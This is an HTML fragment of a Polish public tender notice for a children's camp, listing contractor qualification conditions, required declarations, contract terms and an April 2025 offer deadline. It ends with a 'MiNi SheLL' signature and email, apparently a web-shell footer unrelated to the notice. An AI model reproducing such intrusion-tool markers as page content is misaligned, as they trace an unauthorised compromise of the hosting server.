class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa: <br/>1) Warunek ten w zakresie zdolności technicznej zostanie uznany za spełniony jeśli Wykonawca wykaże, że posiada miejsce zakwaterowania uczestników obozu w odległości nie większej niż 30 km od siedziby Zamawiającego – licząc dojazd po drogach publicznych. Wzór oświadczenia stanowi zał. nr 3.<br/><br/>2) Warunek ten w zakresie zdolności zawodowej zostanie uznany za spełniony jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – to w tym okresie, zorganizował co najmniej 5 obozów dla minimum 30 dzieci. Wzór wykazu stanowi zał. nr 6. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty każdy Wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w załączniku nr 3 do SWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Oświadczenie o zgłoszeniu obiektu, w którym będą zakwaterowani uczestnicy obozu, do właściwego kuratorium oświaty (w formularzu oferty stanowiącym zał. nr 1 do SWZ)<br/>2)	Oświadczenie, że obiekt, w którym będą zakwaterowani uczestnicy obozu, posiada pozytywną opinię sanepid i p.poż (w formularzu oferty stanowiącym zał. nr 1 do SWZ)<br/>3)	Oświadczenie, że osoby, które będą wyznaczone jako opiekunowie posiadają zaświadczenia o niekaralności z Krajowego Rejestru Karnego oraz nie figurują w bazie danych Rejestru Sprawców Przestępstw na Tle Seksualnym (w formularzu oferty stanowiącym zał. nr 1 do SWZ)<br/>4) Wykaz usług wykonanych/wykonywanych, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, z załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie. Wzór wykazu usług stanowi zał. nr 6 do SWZ. <br/>Dowodami o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane/ są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie, wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe: Zamawiający wymaga złożenia wraz z ofertą programu obozu - stanowiącego załącznik do oferty. Wymieniony wyżej element stanowi integralną część oferty, będzie oceniany w ramach kryterium oceny ofert. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. konsorcjum, spółka cywilna), do oferty należy dołączyć pełnomocnictwo w którym wykonawcy wspólnie ubiegający się o udzielenie zamówienia umocowali jeden podmiot do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (zgodnie z art. 58 ust. 2 ustawy Pzp).<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie z art. 125 ust. 1 w związku z art. 273 ust. 2 ustawy Pzp o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu , składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp (treść art. określona w ust. 9.4. SWZ), wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) dołączą do oferty oświadczenie określone w art.117 ust. 4 ustawy Pzp, z którego będzie wynikało, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określają istotne postanowienia umowy - wzór umowy, stanowiący zał. nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-ba3628d7-b8c0-4b93-b391-f08c71aa5f29</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-17 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com